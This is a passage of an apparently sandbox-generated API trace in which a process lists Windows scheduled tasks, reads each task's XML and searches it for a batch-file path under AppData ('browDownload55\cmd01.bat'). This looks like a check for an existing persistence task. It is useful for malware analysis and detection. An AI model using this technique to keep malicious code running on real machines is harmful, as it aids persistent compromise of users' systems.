1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n \\Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n") returned 0x0 [0164.000] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n \\Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.000] IUnknown:Release (This=0x929740) returned 0x0 [0164.000] IUnknown:Release (This=0x9295a0) returned 0x0 [0164.000] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0164.001] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.001] IUnknown:Release (This=0x9295a0) returned 0x0 [0164.001] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.001] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.001] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0164.002] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0164.002] IUnknown:Release (This=0x929590) returned 0x0 [0164.002] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0164.003] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.003] IUnknown:Release (This=0x929590) returned 0x0 [0164.003] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.003] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.003] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0164.003] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0164.003] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0164.004] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Calibration Loader") returned 0x0 [0164.004] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n ConsoleConnect\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490D-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0164.005] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n ConsoleConnect\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490D-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.005] IUnknown:Release (This=0x929730) returned 0x0 [0164.005] IUnknown:Release (This=0x9295a0) returned 0x0 [0164.005] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0164.006] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.006] IUnknown:Release (This=0x9295a0) returned 0x0 [0164.006] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.006] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.006] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0164.007] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0164.007] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0164.007] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Automatic App Update") returned 0x0 [0164.007] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-603)\r\n \\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT4H\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {A6BA00FE-40E8-477C-B713-C64A14F18ADB}\r\n \r\n \r\n") returned 0x0 [0164.008] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-603)\r\n \\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT4H\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {A6BA00FE-40E8-477C-B713-C64A14F18ADB}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.008] IUnknown:Release (This=0x929720) returned 0x0 [0164.008] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0164.008] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Scheduled Start") returned 0x0 [0164.008] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n Microsoft Corporation.\r\n Microsoft Corporation.\r\n This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.\r\n \\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2022-03-26T20:00:38+02:00\r\n PT1M\r\n \r\n \r\n false\r\n ConsoleDisconnect\r\n \r\n \r\n false\r\n RemoteDisconnect\r\n \r\n \r\n false\r\n 7508BCA3380C960C\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\sc.exe\r\n start wuauserv\r\n \r\n \r\n") returned 0x0 [0164.009] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation.\r\n Microsoft Corporation.\r\n This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.\r\n \\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2022-03-26T20:00:38+02:00\r\n PT1M\r\n \r\n \r\n false\r\n ConsoleDisconnect\r\n \r\n \r\n false\r\n RemoteDisconnect\r\n \r\n \r\n false\r\n 7508BCA3380C960C\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\sc.exe\r\n start wuauserv\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.009] IUnknown:Release (This=0x929720) returned 0x0 [0164.009] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0164.009] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="sih") returned 0x0 [0164.009] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-102)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sih\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT20H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n \r\n \r\n") returned 0x0 [0164.010] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-102)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sih\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT20H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.010] IUnknown:Release (This=0x929720) returned 0x0 [0164.010] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0164.010] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="sihboot") returned 0x0 [0164.010] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-103)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sihboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2M\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n /boot\r\n \r\n \r\n") returned 0x0 [0164.011] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-103)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sihboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2M\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n /boot\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.011] IUnknown:Release (This=0x929720) returned 0x0 [0164.011] IUnknown:Release (This=0x929590) returned 0x0 [0164.011] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0164.012] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.012] IUnknown:Release (This=0x929590) returned 0x0 [0164.012] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.012] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x50, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.012] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0164.013] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0164.013] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0164.013] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="CacheTask") returned 0x0 [0164.013] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x001200a9;;;BU)(A;;0x001200a9;;;WD)(A;;0x001200a9;;;LW)\r\n $(@%systemroot%\\system32\\wininet.dll,-16000)\r\n $(@%systemroot%\\system32\\wininet.dll,-16001)\r\n \\Microsoft\\Windows\\Wininet\\CacheTask\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {0358B920-0AC7-461F-98F4-58E32CD89148}\r\n \r\n \r\n") returned 0x0 [0164.014] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x001200a9;;;BU)(A;;0x001200a9;;;WD)(A;;0x001200a9;;;LW)\r\n $(@%systemroot%\\system32\\wininet.dll,-16000)\r\n $(@%systemroot%\\system32\\wininet.dll,-16001)\r\n \\Microsoft\\Windows\\Wininet\\CacheTask\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {0358B920-0AC7-461F-98F4-58E32CD89148}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.014] IUnknown:Release (This=0x929700) returned 0x0 [0164.014] IUnknown:Release (This=0x929580) returned 0x0 [0164.014] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0164.015] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.015] IUnknown:Release (This=0x929580) returned 0x0 [0164.015] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.015] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x51, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.016] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0164.016] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0164.016] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0164.016] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="WIM-Hash-Management") returned 0x0 [0164.016] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Management\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA32B188341\r\n 01\r\n \r\n \r\n 7528BCA32B188341\r\n 03\r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n") returned 0x0 [0164.017] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Management\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA32B188341\r\n 01\r\n \r\n \r\n 7528BCA32B188341\r\n 03\r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.017] IUnknown:Release (This=0x9296f0) returned 0x0 [0164.017] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0164.017] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="WIM-Hash-Validation") returned 0x0 [0164.017] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n") returned 0x0 [0164.018] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.018] IUnknown:Release (This=0x9296f0) returned 0x0 [0164.018] IUnknown:Release (This=0x929580) returned 0x0 [0164.018] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0164.019] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.019] IUnknown:Release (This=0x929580) returned 0x0 [0164.019] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.019] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x52, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.019] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0164.020] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0164.020] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0164.020] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="Work Folders Logon Synchronization") returned 0x0 [0164.020] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18000)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18001)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18002)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\r\n \r\n \r\n \r\n") returned 0x0 [0164.021] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18000)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18001)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18002)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.021] IUnknown:Release (This=0x929710) returned 0x0 [0164.021] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0164.021] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="Work Folders Maintenance Work") returned 0x0 [0164.021] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18004)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18005)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18006)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Maintenance Work\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n P1D\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {63260BCE-A3FB-4A34-AA51-D4D8E877B62B}\r\n \r\n \r\n") returned 0x0 [0164.022] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18004)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18005)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18006)\r\n 